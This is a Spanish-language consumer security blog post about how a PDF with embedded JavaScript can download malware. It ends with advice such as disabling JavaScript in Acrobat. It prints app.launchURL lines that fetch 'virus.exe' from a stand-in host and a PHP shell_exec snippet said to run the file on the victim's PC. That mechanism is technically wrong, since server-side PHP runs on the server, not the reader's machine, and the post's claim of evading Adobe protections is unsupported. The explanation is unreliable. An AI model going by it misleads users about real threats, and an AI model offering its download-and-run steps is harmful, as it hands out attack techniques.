Cómo un PDF malicioso puede infectar tu PC sin que lo notes

 

¡Cómo un PDF malicioso puede infectar tu PC sin que lo notes!

Símbolo del PDF en un PC

Cómo los PDFs Pueden Infectar Tu Ordenador Sin Que Lo Sepas

📢 ¿Sabías que un simple archivo PDF puede poner en riesgo tu ordenador?
Aunque los usamos todos los días para leer documentos, facturas o informes, los ciberdelincuentes han encontrado formas de usarlos para descargar y ejecutar programas sin que te des cuenta.

Hoy te explicaré cómo funciona esta técnica y cómo puedes protegerte.

🔍 ¿Cómo un PDF Puede Descargar y Ejecutar Archivos?

Los archivos PDF parecen inofensivos, pero algunos pueden contener código oculto que permite abrir enlaces, descargar archivos y, en algunos casos, ejecutar programas.

Ejemplo 1: Un PDF Que Descarga Spotify

Imagina que recibes un PDF con una oferta exclusiva para descargar Spotify. Dentro del archivo, hay un botón de descarga que al hacer clic abre tu navegador y descarga el programa.

Este código dentro del PDF haría justamente eso:

app.launchURL("https://download.scdn.co/SpotifySetup.exe", true);

Hasta aquí todo bien, ¿cierto? Pero ...

¿y si el enlace no es de Spotify, sino de un software malicioso?

⚠️ Ejemplo 2: Un PDF Que Descarga y Ejecuta Un Virus

Los ciberdelincuentes pueden usar la misma técnica para descargar un archivo malicioso en lugar de Spotify. 

⚠️Este código es muy básico, los ciberdelincuentes suelen usar códigos mucho más elaborados y difíciles de entender. Éste se hizo básico para que sea fácil de entender. Pero también puede ser funcional e incluso evitar las protecciones de acrobat adobe⚠️

🔹 Paso 1: El PDF descarga un archivo infectado

app.launchURL("https://sitio-falso.com/virus.exe", true);

🔹 Paso 2: Otro PDF o una web ejecuta el archivo sin que te des cuenta

app.launchURL("https://sitio-falso.com/ejecutar.php", true);

Este es el segundo archivo ejecutar.php que activa el código anterior y puede contener un código que ejecuta el virus en segundo plano:

<?php
shell_exec("start C:\\Usuarios\\Descargas\\virus.exe");
?>

🎯 El resultado:

  • El usuario cree que está descargando un programa legítimo.
  • Una vez descargado, otro archivo o una página web lo ejecuta sin aviso.
  • No es necesario que el usuario haga clic en nada más.

Este tipo de ataques han sido utilizados en el pasado para propagar troyanos bancarios, ransomware y programas espía.

🛑 Cómo Puedes Protegerte

No necesitas ser experto en seguridad informática para evitar estos ataques. Solo sigue estas recomendaciones:

Desactiva JavaScript en tu lector de PDF (si no lo necesitas). Para ello hay que pulsar a Edición, a partir de ahí pulsar preferencias. Saldrá un menú desplegable y en el panel izquierdo hay que buscar el botón javascript. Una vez ahí, se podrá ver la opción de desactivar javascript. En las capturas siguientes se puede ver. Pulsa en las imágenes para poder verlas mejor.

Buscar en herramientas javascript
Se muestra la opción para retirar javascript

No abras archivos PDF de correos electrónicos desconocidos.
Revisa siempre los enlaces antes de hacer clic.
Si descargas un programa desde un PDF, verifica que sea de la página oficial.
Mantén tu antivirus y tu sistema operativo actualizados.

💡 Dato importante: !Las empresas y profesionales también pueden ser víctimas de estos ataques, comprometiendo datos sensibles y sistemas internos!.

📢 Conclusión: Protege tu Información Antes de que Sea Tarde

Este método de ataque demuestra que los archivos PDF pueden ser más peligrosos de lo que parecen. Aunque aquí usamos el ejemplo de Spotify, un atacante podría utilizar la misma técnica para infectar tu ordenador con un virus.